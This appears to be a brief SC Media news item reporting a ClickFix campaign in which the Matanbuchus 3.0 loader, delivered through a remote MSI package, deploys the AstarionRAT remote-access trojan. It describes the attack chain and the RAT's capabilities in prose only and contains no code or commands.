Malicious actors have leveraged the Matanbuchus 3.0 malware-as-a-service loader to deploy the novel AstarionRAT payload in an attack campaign that involved ClickFix techniques, according to GBHackers News.Intrusions commenced with a prompt tricking targets into copying and pasting into the local console a command that exploits msiexec.exe to inject a remote MSI package with invisible UI, a report from the Huntress Tactical Response team and SOC showed. Execution of the MSI facilitates the delivery of files, including Zillya antivirus components and a DLL file serving as the Matanbuchus 3.0 loader.Integrated into Matanbuchus 3.0 were sensitive strings within a ChaCha20-encrypted blob and core shellcode, with the loader performing antivirus and endpoint detection and response process enumeration before eventually deploying AstrarionRAT. Two dozen commands on file management, credential-backed logon, process control, scanning, SOCKS5 tunneling port, and in-memory reflective payload execution are being supported by AstarionRAT, said researchers.
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds